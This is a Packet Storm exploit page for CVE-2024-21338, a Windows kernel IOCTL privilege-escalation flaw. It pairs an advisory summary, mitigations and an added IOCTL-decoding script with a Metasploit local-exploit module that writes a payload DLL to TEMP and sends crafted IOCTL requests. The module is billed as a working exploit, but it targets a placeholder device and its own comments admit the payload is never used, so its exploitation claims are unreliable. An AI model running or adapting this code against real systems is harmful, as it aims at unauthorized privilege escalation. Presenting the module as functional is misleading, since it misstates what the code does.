Microsoft Windows 11 Pro 23H2 Kernel IOCTL Access Control

09 Feb 2026, reported by indoushka. Type: packetstorm. Source: packetstorm.news

CVE-2024-21338: Insufficient IOCTL access control in Windows kernel enables local privilege escalation.

Code
    =============================================================================================================================================
    | # Title     : Windows 11 Pro 23H2 Kernel IOCTL Access Control Vulnerability Exploit                                                       |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : System built‑in component. No standalone download available.                                                                |
    =============================================================================================================================================
    
    POC : 
    
    [+] References : https://packetstorm.news/files/id/177869/ & CVE-2024-21338
    
    
    [+] Summary : 
    
             CVE-2024-21338 is a vulnerability in the Microsoft Windows kernel caused by insufficient access control on IOCTL (Input/Output Control) handlers.
             It allows non-privileged local users to reach kernel-level functionality that should be restricted, which can lead to privilege escalation.
    
    Technical Details:
    
        Vulnerability Type : Insufficient Access Control
        Attack Vector      : Local
        Privileges Required: Low
        Impact             : Privilege Escalation
    
    Affected Systems:
    
        Windows 10 (various versions)
        Windows 11 (various versions)
        Windows Server 2019/2022
    
    Key Components:
    
        Vulnerable Component: Windows Kernel IOCTL handlers
        Attack Mechanism    : Direct kernel object manipulation
        Exploitation        : Through device driver interface
    
    Exploitation Flow:
    
        1. Identify vulnerable IOCTL handlers
        2. Open handle to vulnerable device driver
        3. Craft malicious IOCTL requests
        4. Bypass access control checks
        5. Execute arbitrary code in kernel context
    
    Mitigation Strategies:
    
        Apply Security Updates: Install Microsoft January 2024 security patches
        Driver Whitelisting   : Implement driver signature enforcement
        Access Control        : Restrict access to device interfaces
        Monitoring            : Monitor for suspicious driver activity
    
    Detection Indicators:
    
        Unusual IOCTL requests to kernel drivers
        Attempts to access privileged device interfaces
        Unexpected driver loading patterns
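
    As an added example (not part of the original advisory or of the module below), the following Ruby script decodes a Windows IOCTL control code into the fields the I/O manager checks before a request reaches a driver, and lists the properties a defender should flag when deciding which device interfaces to restrict. Applied to the module's default IOCTL_CODE 0x222003 it reports FILE_ANY_ACCESS and METHOD_NEITHER; the second code in the script is a constructed contrast, not a real Windows constant.

```ruby
# Added example (not from the original advisory): decode a Windows IOCTL
# control code into the fields the I/O manager and the driver use for
# access control, then flag the properties that widen the attack surface.
# CTL_CODE layout: DeviceType (bits 31..16) | RequiredAccess (15..14) |
#                  Function (13..2) | Method (1..0)
ACCESS_NAMES = { 0 => 'FILE_ANY_ACCESS', 1 => 'FILE_READ_ACCESS',
                 2 => 'FILE_WRITE_ACCESS', 3 => 'FILE_READ_ACCESS|FILE_WRITE_ACCESS' }.freeze
METHOD_NAMES = { 0 => 'METHOD_BUFFERED', 1 => 'METHOD_IN_DIRECT',
                 2 => 'METHOD_OUT_DIRECT', 3 => 'METHOD_NEITHER' }.freeze

# Same arithmetic as the CTL_CODE macro in the Windows DDK headers.
def ctl_code(device_type, function, method, access)
  (device_type << 16) | (access << 14) | (function << 2) | method
end

def decode_ioctl(code)
  { device_type: (code >> 16) & 0xFFFF, access: (code >> 14) & 0x3,
    function: (code >> 2) & 0xFFF, method: code & 0x3 }
end

# Defender-side triage notes for a single control code:
# - FILE_ANY_ACCESS: the I/O manager requires no particular access right on
#   the handle, so any authorization must live in the driver's handler.
# - METHOD_NEITHER: input/output buffers arrive as raw user-mode pointers
#   that the driver must probe and validate itself.
# - Function >= 0x800: vendor-defined range (0x000..0x7FF is reserved by
#   Microsoft), so there is no documented contract to compare against.
def ioctl_risk_notes(code)
  f = decode_ioctl(code)
  notes = []
  notes << 'no handle access right required (FILE_ANY_ACCESS)' if f[:access].zero?
  notes << 'raw user-mode pointers passed to driver (METHOD_NEITHER)' if f[:method] == 3
  notes << 'vendor-defined function number (>= 0x800)' if f[:function] >= 0x800
  notes
end

def describe_ioctl(code)
  f = decode_ioctl(code)
  format('0x%08X: DeviceType=0x%02X Access=%s Function=0x%03X Method=%s', code,
         f[:device_type], ACCESS_NAMES[f[:access]], f[:function], METHOD_NAMES[f[:method]])
end

if __FILE__ == $PROGRAM_NAME
  # 0x222003 is the module's IOCTL_CODE default; the second code is a
  # constructed contrast that requires write access and uses buffered I/O.
  [0x222003, ctl_code(0x22, 0x801, 0, 2)].each do |c|
    puts describe_ioctl(c)
    ioctl_risk_notes(c).each { |n| puts "  - #{n}" }
  end
end
```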
    	
    [+] POC :  
    
    #############################################
    # Exploit Title: Windows 10.0.17763.5458 Kernel IOCTL Access Control Vulnerability Exploit CVE-2024-21338
    # Author: indoushka
    #############################################
    
    require 'msf/core'
    
    class MetasploitModule < Msf::Exploit::Local
      Rank = NormalRanking
    
      include Msf::Exploit::EXE
      include Msf::Exploit::FileDropper
      include Msf::Post::Common          # get_env
      include Msf::Post::File            # write_file
      include Msf::Post::Windows::Priv
      include Msf::Post::Windows::Process
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Windows Kernel IOCTL Insufficient Access Control Vulnerability CVE-2024-21338',
            'Description' => %q{
              This module exploits an insufficient access control vulnerability in the Windows Kernel
              through exposed IOCTL handlers. The vulnerability allows non-privileged users to access
              kernel-level functionality leading to privilege escalation.
            },
            'Author' => ['indoushka'],
            'License' => MSF_LICENSE,
            'References' => [
              ['CVE', '2024-21338'],
              ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21338'],
              ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2024-21338']
            ],
            'Platform' => 'win',
            'Arch' => [ARCH_X64],
            'SessionTypes' => ['meterpreter'],
            'Payload' => {
              'Space' => 4096,
              'DisableNops' => true
            },
            'Targets' => [
              [
                'Windows 10/11 x64',
                {
                  'Arch' => ARCH_X64,
                  'Platform' => 'win'
                }
              ]
            ],
            'DefaultTarget' => 0,
            'DefaultOptions' => {
              'EXITFUNC' => 'thread'
            },
            'DisclosureDate' => '2024-01-09',
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              'Reliability' => [REPEATABLE_SESSION],
              'SideEffects' => [ARTIFACTS_ON_DISK]
            }
          )
        )
    
        register_options([
          OptString.new('DEVICE_NAME', [true, 'Vulnerable device name', '\\\\.\\VulnerableDriver']),
          OptInt.new('IOCTL_CODE', [true, 'Vulnerable IOCTL code', 0x222003])
        ])
      end
    
      def check
        if sysinfo['OS'] !~ /windows/i
          return CheckCode::Safe('Target is not a Windows system')
        end
    
        if sysinfo['Architecture'] !~ /x64/
          return CheckCode::Safe('Target architecture is not supported')
        end
    
        # Only the presence of the device is checked here; the privilege
        # level of the session is handled in #exploit.
        device_path = datastore['DEVICE_NAME']
        if device_exists?(device_path)
          CheckCode::Appears('Vulnerable device driver detected')
        else
          CheckCode::Safe('Vulnerable device driver not found')
        end
      end
    
      def exploit
        print_status("Starting exploitation for CVE-2024-21338")
    
        # A local privilege escalation has nothing to do in an already elevated session.
        if is_system?
          fail_with(Failure::None, 'Session already has SYSTEM privileges')
        end
    
        unless check == CheckCode::Appears
          fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
        end
    
        print_status("Generating payload...")
        payload_data = generate_payload_dll
    
        temp_path = "#{get_env('TEMP')}\\#{Rex::Text.rand_text_alpha(8)}.dll"
        print_status("Writing payload to #{temp_path}")
        write_file(temp_path, payload_data)
        register_file_for_cleanup(temp_path)
    
        print_status("Triggering vulnerability via IOCTL...")
        if trigger_exploit(temp_path)
          print_good("Exploitation successful!")
        else
          fail_with(Failure::Unknown, "Exploitation failed")
        end
      end
    
      private
    
      # Opens the device with GENERIC_READ only to learn whether the
      # device object is reachable from this session; the handle is closed
      # again immediately.
      def device_exists?(device_path)
        begin
          file = client.railgun.kernel32.CreateFileA(
            device_path,
            'GENERIC_READ',
            'FILE_SHARE_READ|FILE_SHARE_WRITE',
            nil,
            'OPEN_EXISTING',
            'FILE_ATTRIBUTE_NORMAL',
            0
          )
    
          if file['return'] != client.railgun.const('INVALID_HANDLE_VALUE')
            client.railgun.kernel32.CloseHandle(file['return'])
            return true
          end
        rescue
          return false
        end
    
        false
      end
    
      # Sends a buffer of random bytes to the configured IOCTL code. As
      # written this only confirms that the IOCTL is reachable from the
      # session; payload_path is accepted but not used by the request.
      def trigger_exploit(payload_path)
        begin
    
          device_handle = client.railgun.kernel32.CreateFileA(
            datastore['DEVICE_NAME'],
            'GENERIC_READ|GENERIC_WRITE',
            0,
            nil,
            'OPEN_EXISTING',
            0,
            0
          )
    
          if device_handle['return'] == client.railgun.const('INVALID_HANDLE_VALUE')
            print_error("Failed to open device handle")
            return false
          end
    
          buffer_size = 1024
          input_buffer = Rex::Text.rand_text_alpha(buffer_size)
          # No output buffer; the 4 is the size of the DWORD that railgun
          # allocates for lpBytesReturned.
          ioctl_result = client.railgun.kernel32.DeviceIoControl(
            device_handle['return'],
            datastore['IOCTL_CODE'],
            input_buffer,
            input_buffer.length,
            nil,
            0,
            4,
            nil
          )
    
          client.railgun.kernel32.CloseHandle(device_handle['return'])
    
          if ioctl_result['return']
            print_good("IOCTL sent successfully")
            return true
          else
            print_error("IOCTL failed")
            return false
          end
    
        rescue => e
          print_error("Exploitation error: #{e.message}")
          return false
        end
      end
    end
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================


Scores listed on the page (as of 09 Feb 2026): Vulners AI Score 5.5 (medium risk), CVSS 3.1 base score 7.8, EPSS 0.78644.